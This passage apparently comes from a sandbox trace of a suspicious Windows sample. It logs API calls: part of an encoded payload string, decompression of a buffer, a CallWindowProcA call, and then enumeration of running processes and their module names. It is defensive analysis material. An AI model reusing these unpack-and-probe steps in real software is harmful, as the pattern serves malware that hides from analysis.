54\x748b\x18fd\x3254\x317b\x9549\x41e7\x5571\xc406\x1863\x5475\x4c4b\x3164\x9e33\x7f1d\x796b\x1d32\x4d4b\x3267\x43aa\x9a43\xc46e\x2935\x1279\x413d\x4153\x3437\xbe2f\x5444\x280b\x3116\x1ce1\x3d\xc134\x5d95\x323d\x3214\x63fc\x2562\xc40a\x755a\x3db8\x81a7\x416c\x3647\x53f\x6448\x9832\xd021\x5f5e\xb26c\x293a\x69f9\xb94c\x3323\x66c5\x30b2\x4f1\x8a34\x3579\x18a\xd653\x442\xb12d\x5404\x6738\x3114\x6646\x421d\x7907\x6a33\x357b\x20c\x5c56\x17\xb756\x3104\x5de\x9a45\x3563\xe1a0\x461d\x648b\xfe33\x3164\x3a2\xb32d\xe431\x3882\x45f3\x4b6e\x8bc7\x31f2\x49a\x8634\xbd5e\x3e14\xbc0e\x64ff\x7b20\x1c35\x22e3\xc8b\x6258\x7c3f\x1935\x1020\xcd4a\x2187\x326b\x88b8\x3569\x608e\x485f\x6047\x844\x6546\xb935\x5509\x3462\x3069\x2908\x4310\x5265\x2c0e\x291a\xfa8\x6257\x45f\x5557\xe3bb\x64dc\xc5b\x6752\xc958\xdb71\x45c\x5913\xb056\x8141\x132e\x7a15\x6532\x354a\xc45b\xdb62\xc724\x7862\xa134\x3509\xd319\x3510\xb54d\x451d\x1830\x2d73\x3175\x18ea\xee4d\x20c3\xad35\xa1bb\x6a6\xe8ee\xa4b2\x3177\xc118\xc448\x545\x3523\x34b6\x76f7\x5444\xad31\xc054\x2259\x425d\x7dc5\xa921\x347b\x386b\x7a1\x16fe\x6116\xa9c6\xc519\x7ddd\x3563\xc4eb\x7218\xa47b\x5c12\x8008\x8633\x76b1\xf99c\x4c55\x75e3\x2e57\x35e6\x4056\x9456\x3304\x254f\x3075\xa6a2\x967b\x466d\x7b78\x2dc3\xafa5\xafe8\x281c\x39f0\xa137\x5d17\x3217\x8312\x5c2b\x18e6\x5b05\xe025\x31f5\x5cb\x6846\x405d\x24e0\x9c33\x23f6\x43b5\x628c\x79a7\x3f68\x3508\x6ed3\x4303\xeb77\x3417\x61f4\xf56c\x3609\x3511\x38fb\xc19d\xd084\xfd33\x7371\xf59\x2b\x2234\x1ec2\x96fa\x8217\x5b65\x3cb2\x7eb\x86fc\x38f9\x2fc\xf0e2\x4537\xfe2f\xbcf1\x2f03\xc162\x3369\x879c\xf9ec\x9c3f\x297c\x9a1a\x3316\x69\xe56\x3104\x500\x9b45\x592\xe147\x461d\x64dd\xd033\x3164\x9eeb\x421d\x725\xea83\x357b\x26e\x9956\x0f\x5556\x3104\x4511\x4344\x3563\xb831\x461d\x5254\x5c33\x42\x8af7\xe418\xf999\x7732\x37fb\x2b26\x751\x6c85\x33a6\x4c3f\x84b\x382\x3663\x70c6\x4209\x60a6\x28b3\x5ed\xf2a9\xa3d2\x49d2\x1799\x35ad\xe36f\x6157\x30a9\xd60e\xcc34\xfc18\xe129\xc652\xe58d\xbf2b\xc9fe\xda32\x8e9e\x32c4\x88d9\x5fd5\x621\x2ffa\x1e0a\x839a\xc759\x356b\x2d85\x3474\x81fd\x84e\x8546\x7b33\xeb35\x3282\x3069\x13e8\x4319\x5415\x2581\x85b7\x4d76\x312b\x12f3\x3562\x3a02\x16f8\x3076\xf822\x215b\x2d5a\x2c58\xbe05\xf864\x70ba\x202d\x793d\x6920\x7504\xffa7\x5825\xa026\xa35e\xd932\x2ebd\xdc8d\x2e0\x5c71\x47dd\x48c5\x5d43\xd154\x335b\x1f41\x4944\xad30\xc44b\x4757\xdb60\x3172\xce52\x4a3c\xed7f\x32b5\x62e2\x4b6\x265c\x6605\x356d\x564\x8d68\x74dc\x7dc5\xdda5\x19d8\x8220\x4ac5\x4192\x843b\xaa84\x3f8\x91b4\x18bb\x34f7\x76b9\xe5e5\x85ae\x31e4\xb5ad\x7286\xf95b\xe9d3\x6bb\x825b\x9f65\x2132\x2056\x720f\xed49\x70d0\xb553\xd783\x466c\xabc0\x9f72\x3e67\x34a8\x731c\x4565\xdbca\x6567\x3217\x7e8\x3072\x56f\x705\x3e98\x778\x4533\x4145\x7010\xe478\xe53c\x5c64\x7e8\xb9dc\x4cb4\x2f03\x5c3\xbe57\x7773\xe845\x4043\x8535\x35b9\x186\xa853\x7416\x4679\x6485\xf433\x3164\x32c\x282d\xe98d\x7cba\x350b\x3292\xde66\x42\x3576\x7166\x2049\x2945\x6581\x74ef\xaa2d\x4c34\x2d35\x11cc\x3f59\x7827\x4534\x2d67\x3447\x3257\x2356\x3044\x5455\x2934\x4549\x310a\x3513\x7a37\x466d\x4730\x6d9b\x3b54\x3559\x423d\x5532\x2b33\x17e1\x3457\x337e\x1e44\x3256\x31d2\xe02f\x6744\x25cb\x5a11\x702d\x54b6\x2c35\x1bf2\x375e\x827e\x1a14\x2dc9\xb478\x7a13\x3772\x3076\x8d0e\x3100\xca2d\xd04f\x3b55\x367d\x1e23\x50b5\x6717\x3168\x5b44\x412d\x2134\x8e32\x611b\x72ee\x2a40\xa604\x785a\x3db2\xc801\x17c4\x3451\xb945\xcb0b\xd338\xa015\xb258\x377f\x695\x6bb4\x1055\xf578\x72ed\xb5a2\x3003\x223e\x34\x6c8a\x38c2\xbd3f\x3dc1\x552d\xd634\xe920") returned 0x22108 [0198.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x37d004c, cbMultiByte=139528, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 139528 [0198.942] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x18f974 | out: ppsaOut=0x18f974) returned 0x0 [0198.943] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0198.943] GetUserDefaultLCID () returned 0x409 [0198.943] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f898, cchData=6 | out: lpLCData="1252") returned 5 [0198.943] SysStringLen (param_1="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x24 [0198.943] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0198.944] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x18f8fc | out: ppsaOut=0x18f8fc) returned 0x0 [0198.974] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8e0 | out: ppsaOut=0x18f8e0) returned 0x0 [0198.975] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0198.975] SafeArrayDestroyDescriptor (psa=0x68e8a8) returned 0x0 [0198.975] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0198.975] SafeArrayDestroyDescriptor (psa=0x68e8a8) returned 0x0 [0198.975] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0198.975] SafeArrayDestroyDescriptor (psa=0x68e8a8) returned 0x0 [0198.975] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0198.975] SafeArrayDestroyDescriptor (psa=0x68e8a8) returned 0x0 [0198.975] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0198.975] SafeArrayDestroyDescriptor (psa=0x68e8a8) returned 0x0 [0198.975] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0198.976] SafeArrayDestroyDescriptor (psa=0x68e8a8) returned 0x0 [0198.976] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7a0 | out: ppsaOut=0x18f7a0) returned 0x0 [0198.976] SafeArrayDestroyDescriptor (psa=0x68e8a8) returned 0x0 [0198.976] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0198.976] RtlDecompressBuffer (in: CompressionFormat=0x2, UncompressedBuffer=0x38d0020, UncompressedBufferSize=0x1a9cd8, CompressedBuffer=0x37d0048, CompressedBufferSize=0x22107, FinalUncompressedSize=0x18f8f8 | out: UncompressedBuffer=0x38d0020, FinalUncompressedSize=0x18f8f8) returned 0x0 [0198.977] GetLastError () returned 0x578 [0198.977] SafeArrayDestroyDescriptor (psa=0x68e810) returned 0x0 [0198.977] SafeArrayRedim (in: psa=0x5e36a0, psaboundNew=0x18f84c | out: psa=0x5e36a0) returned 0x0 [0199.036] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0199.036] SafeArrayCopy (in: psa=0x5e36a0, ppsaOut=0x18fa40 | out: ppsaOut=0x18fa40) returned 0x0 [0199.045] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.046] SafeArrayAllocDescriptorEx (in: vt=0x3, cDims=0x1, ppsaOut=0x18f8f4 | out: ppsaOut=0x18f8f4) returned 0x0 [0199.046] EnumProcesses (in: lpidProcess=0x380f050, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lpidProcess=0x380f050, lpcbNeeded=0x18f8e8) returned 1 [0199.047] GetLastError () returned 0x0 [0199.047] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0199.047] GetLastError () returned 0x57 [0199.047] CloseHandle (hObject=0x0) returned 0 [0199.047] GetLastError () returned 0x6 [0199.047] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0199.047] GetLastError () returned 0x5 [0199.047] CloseHandle (hObject=0x0) returned 0 [0199.047] GetLastError () returned 0x6 [0199.047] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0199.047] GetLastError () returned 0x5 [0199.047] CloseHandle (hObject=0x0) returned 0 [0199.047] GetLastError () returned 0x6 [0199.047] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0199.047] GetLastError () returned 0x5 [0199.047] CloseHandle (hObject=0x0) returned 0 [0199.047] GetLastError () returned 0x6 [0199.047] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0199.047] GetLastError () returned 0x5 [0199.047] CloseHandle (hObject=0x0) returned 0 [0199.048] GetLastError () returned 0x6 [0199.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0199.048] GetLastError () returned 0x5 [0199.048] CloseHandle (hObject=0x0) returned 0 [0199.048] GetLastError () returned 0x6 [0199.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0199.048] GetLastError () returned 0x5 [0199.048] CloseHandle (hObject=0x0) returned 0 [0199.048] GetLastError () returned 0x6 [0199.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0199.048] GetLastError () returned 0x5 [0199.048] CloseHandle (hObject=0x0) returned 0 [0199.048] GetLastError () returned 0x6 [0199.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0199.048] GetLastError () returned 0x5 [0199.048] CloseHandle (hObject=0x0) returned 0 [0199.048] GetLastError () returned 0x6 [0199.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0199.048] GetLastError () returned 0x5 [0199.048] CloseHandle (hObject=0x0) returned 0 [0199.048] GetLastError () returned 0x6 [0199.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0199.048] GetLastError () returned 0x5 [0199.048] CloseHandle (hObject=0x0) returned 0 [0199.048] GetLastError () returned 0x6 [0199.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x29c) returned 0x0 [0199.048] GetLastError () returned 0x5 [0199.048] CloseHandle (hObject=0x0) returned 0 [0199.048] GetLastError () returned 0x6 [0199.049] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0199.049] GetLastError () returned 0x5 [0199.049] CloseHandle (hObject=0x0) returned 0 [0199.049] GetLastError () returned 0x6 [0199.049] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0199.049] GetLastError () returned 0x5 [0199.049] CloseHandle (hObject=0x0) returned 0 [0199.049] GetLastError () returned 0x6 [0199.049] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0199.049] GetLastError () returned 0x5 [0199.049] CloseHandle (hObject=0x0) returned 0 [0199.049] GetLastError () returned 0x6 [0199.049] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0199.049] GetLastError () returned 0x5 [0199.049] CloseHandle (hObject=0x0) returned 0 [0199.049] GetLastError () returned 0x6 [0199.049] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0199.049] GetLastError () returned 0x5 [0199.049] CloseHandle (hObject=0x0) returned 0 [0199.049] GetLastError () returned 0x6 [0199.049] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x39c) returned 0x108 [0199.049] GetLastError () returned 0x6 [0199.049] SafeArrayAllocDescriptorEx (in: vt=0x3, cDims=0x1, ppsaOut=0x18f8f0 | out: ppsaOut=0x18f8f0) returned 0x0 [0199.049] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0199.050] GetLastError () returned 0x12b [0199.050] CloseHandle (hObject=0x108) returned 1 [0199.050] GetLastError () returned 0x12b [0199.050] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x110) returned 0x108 [0199.050] GetLastError () returned 0x12b [0199.050] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0199.050] GetLastError () returned 0x12b [0199.050] CloseHandle (hObject=0x108) returned 1 [0199.050] GetLastError () returned 0x12b [0199.050] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x440) returned 0x0 [0199.050] GetLastError () returned 0x5 [0199.050] CloseHandle (hObject=0x0) returned 0 [0199.050] GetLastError () returned 0x6 [0199.050] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x0 [0199.050] GetLastError () returned 0x5 [0199.051] CloseHandle (hObject=0x0) returned 0 [0199.051] GetLastError () returned 0x6 [0199.051] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x108 [0199.051] GetLastError () returned 0x6 [0199.051] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0199.051] GetLastError () returned 0x12b [0199.051] CloseHandle (hObject=0x108) returned 1 [0199.051] GetLastError () returned 0x12b [0199.051] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x0 [0199.051] GetLastError () returned 0x5 [0199.051] CloseHandle (hObject=0x0) returned 0 [0199.051] GetLastError () returned 0x6 [0199.051] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x548) returned 0x108 [0199.051] GetLastError () returned 0x6 [0199.051] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0199.052] GetLastError () returned 0x12b [0199.052] CloseHandle (hObject=0x108) returned 1 [0199.052] GetLastError () returned 0x12b [0199.052] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a0) returned 0x0 [0199.052] GetLastError () returned 0x5 [0199.052] CloseHandle (hObject=0x0) returned 0 [0199.052] GetLastError () returned 0x6 [0199.052] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x624) returned 0x0 [0199.052] GetLastError () returned 0x5 [0199.052] CloseHandle (hObject=0x0) returned 0 [0199.052] GetLastError () returned 0x6 [0199.052] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x730) returned 0x108 [0199.052] GetLastError () returned 0x6 [0199.052] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.053] GetLastError () returned 0x0 [0199.054] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x850000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="easily.exe") returned 0xa [0199.055] GetLastError () returned 0x0 [0199.055] SysStringByteLen (bstr="慥楳祬攮數") returned 0x104 [0199.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.056] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.057] GetLastError () returned 0x0 [0199.057] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xb70000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="stockportsconvenient.exe") returned 0x18 [0199.120] GetLastError () returned 0x0 [0199.120] SysStringByteLen (bstr="瑳捯火牯獴潣癮湥敩瑮攮數") returned 0x104 [0199.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.121] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.122] GetLastError () returned 0x0 [0199.123] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x920000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="dangerous.exe") returned 0xd [0199.124] GetLastError () returned 0x0 [0199.124] SysStringByteLen (bstr="慤杮牥畯⹳硥e") returned 0x104 [0199.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.124] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.126] GetLastError () returned 0x0 [0199.126] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x2b0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="retained_one_psychology.exe") returned 0x1b [0199.127] GetLastError () returned 0x0 [0199.127] SysStringByteLen (bstr="敲慴湩摥潟敮灟祳档汯杯⹹硥e") returned 0x104 [0199.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.127] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.129] GetLastError () returned 0x0 [0199.129] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x890000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="pentium-southampton.exe") returned 0x17 [0199.130] GetLastError () returned 0x0 [0199.130] SysStringByteLen (bstr="数瑮畩⵭潳瑵慨灭潴⹮硥e") returned 0x104 [0199.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.130] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.131] GetLastError () returned 0x0 [0199.132] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xed0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="declare.exe") returned 0xb [0199.132] GetLastError () returned 0x0 [0199.133] SysStringByteLen (bstr="敤汣牡⹥硥e") returned 0x104 [0199.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.133] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.134] GetLastError () returned 0x0 [0199.135] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x140000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="credit-albania.exe") returned 0x12 [0199.135] GetLastError () returned 0x0 [0199.135] SysStringByteLen (bstr="牣摥瑩愭扬湡慩攮數") returned 0x104 [0199.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.136] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.137] GetLastError () returned 0x0 [0199.137] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x3f0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="celebrate.exe") returned 0xd [0199.138] GetLastError () returned 0x0 [0199.138] SysStringByteLen (bstr="散敬牢瑡⹥硥e") returned 0x104 [0199.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.138] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.139] GetLastError () returned 0x0 [0199.140] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x12d0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="watson_block.exe") returned 0x10 [0199.140] GetLastError () returned 0x0 [0199.140] SysStringByteLen (bstr="慷獴湯扟潬正攮數") returned 0x104 [0199.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.141] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.142] GetLastError () returned 0x0 [0199.143] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x1080000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="beef-http-plants.exe") returned 0x14 [0199.143] GetLastError () returned 0x0 [0199.143] SysStringByteLen (bstr="敢晥栭瑴⵰汰湡獴攮數") returned 0x104 [0199.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.144] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.145] GetLastError () returned 0x0 [0199.146] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xe50000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="hunting garmin marriage.exe") returned 0x1b [0199.146] GetLastError () returned 0x0 [0199.146] SysStringByteLen (bstr="畨瑮湩⁧慧浲湩洠牡楲条⹥硥e") returned 0x104 [0199.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.146] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.148] GetLastError () returned 0x0 [0199.148] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xae0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="portsmouth_sauce_certificates.exe") returned 0x21 [0199.148] GetLastError () returned 0x0 [0199.149] SysStringByteLen (bstr="潰瑲浳畯桴獟畡散损牥楴楦慣整⹳硥e") returned 0x104 [0199.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.149] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.150] GetLastError () returned 0x0 [0199.151] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xcd0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="insights hu.exe") returned 0xf [0199.197] GetLastError () returned 0x0 [0199.197] SysStringByteLen (bstr="湩楳桧獴栠⹵硥e") returned 0x104 [0199.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.198] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.199] GetLastError () returned 0x0 [0199.200] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xdf0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="stroke_enough_reporter.exe") returned 0x1a [0199.200] GetLastError () returned 0x0 [0199.200] SysStringByteLen (bstr="瑳潲敫敟潮杵彨敲潰瑲牥攮數") returned 0x104 [0199.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.201] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.202] GetLastError () returned 0x0 [0199.203] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xa0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="por tramadol started.exe") returned 0x18 [0199.203] GetLastError () returned 0x0 [0199.203] SysStringByteLen (bstr="潰⁲牴浡摡汯猠慴瑲摥攮數") returned 0x104 [0199.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.204] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.205] GetLastError () returned 0x0 [0199.205] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xd40000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="add.exe") returned 0x7 [0199.206] GetLastError () returned 0x0 [0199.206] SysStringByteLen (bstr="摡⹤硥e") returned 0x104 [0199.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.206] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.208] GetLastError () returned 0x0 [0199.208] GetModuleBaseNameA (in: hProcess=0x108, hModule=0xcd0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="argentinasovietavg.exe") returned 0x16 [0199.209] GetLastError () returned 0x0 [0199.209] SysStringByteLen (bstr="牡敧瑮湩獡癯敩慴杶攮數") 